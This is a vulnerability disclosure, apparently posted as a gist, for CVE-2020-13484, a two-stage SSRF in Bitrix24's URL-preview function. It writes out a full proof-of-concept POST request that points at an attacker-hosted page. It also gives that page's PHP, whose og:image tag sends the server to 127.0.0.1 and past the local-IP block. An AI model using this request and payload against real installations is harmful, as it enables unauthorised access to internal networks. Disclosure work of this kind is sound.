Last active: October 9, 2023 19:09
CVE-2020-13484
https://gist.github.com/mariuszpoplawski/26e1fbde8f9a607478bee1de90daa329
------------------------------------------
Bitrix24 through 20.0.975 allows SSRF via an intranet IP address in
the services/main/ajax.php?action=attachUrlPreview url parameter, if
the destination URL hosts an HTML document
containing '<meta name="og:image" content="' followed by an intranet URL.
------------------------------------------
[Additional Information]
The vulnerability allows us to trigger server-side request forgery to remote
addresses, and a second vulnerability in the same functionality allowed us to
bypass the restrictions and generate another request that bypassed the
local-IP block policy. We were able to generate requests into the internal
infrastructure.
In the first stage we found an SSRF that only allowed us to send remote
requests. Then we manipulated the parser into parsing our HTML page and
generating a second request to the internal Bitrix core on the server side.
Bitrix was parsing og:image tags; this way we could trigger a second SSRF.
The second request was not properly checked for "local" IPs.
To generate the SSRF we need to trigger the following request:
POST /bitrix/services/main/ajax.php?action=attachUrlPreview&show_actions=y&buildd_preview=y&die_step=3&admin_section=Y&show_cache_stat1=Y&clear_cache=Y&c=bitrix:main.urlpreview&mode=ajax&=&sessid=bd277e27ef185f42bebbb1d538e66574&signedParamsString=1.12&listSubscribeId[]=1&itemId=1&deleteSubscribe=Y&userFieldId=0&elementId=1 HTTP/1.1
Host: 192.168.1.24
Origin: http://192.168.1.24
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36
Bx-ajax: true
Accept: */*
Referer: http://192.168.1.24/stream/
Accept-Encoding: gzip, deflate
Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: BITRIX_SM_TIME_ZONE=-120; BITRIX_SM_SALE_UID=0; BITRIX_SM_SOUND_LOGIN_PLAYED=Y; PHPSESSID=btu7cck1irm51hsgs45akh5dma; BITRIX_SM_NCC=Y; BITRIX_SM_LOGIN=admin; BITRIX_SM_LAST_SETTINGS=;show_cache_stat=Y
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
url=http://OurVPSHost/index.php?id=1
"OurVPSHost" host index.php file:
---------------------------------
<?php header('Content-Type:text/html'); ?>
<meta name="og:image" content="http://127.0.0.1/fake_img.php"/>
---------------------------------
The vulnerability sends a second SSRF: the first request does not allow
sending internal requests, but the HTML parser parses our og:image tag and
sends an internal request by redirecting the Bitrix server to
127.0.0.1/fake_img.php. This way we are able to bypass the restrictions of
the Bitrix core.
------------------------------------------
[VulnerabilityType Other]
Unauthorized server-side request forgery, bypass of domain whitelist
------------------------------------------
[Vendor of Product]
1c-bitrix.ru, bitrix24.net
------------------------------------------
[Affected Product Code Base]
Bitrix and Bitrix Cloud instances are affected up to security update (main 20.0.975); reported and fixed in the latest patch
------------------------------------------
[Affected Component]
Main core URLPreview function
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[CVE Impact Other]
Force server-side request forgery
------------------------------------------
[Attack Vectors]
To exploit the vulnerability the attacker needs access to the website, a
valid unauthenticated session and a CSRF token; all can be generated without
any privileges, no additional requirements needed.
------------------------------------------
[Has vendor confirmed or acknowledged the vulnerability?]
true
------------------------------------------
[Discoverer]
Mariusz Poplawski (afine.pl)
------------------------------------------
[Reference]
https://www.bitrix24.com/prices/self-hosted.php
https://www.bitrix24.com/security/
Mariusz Popłwski / AFINE.com team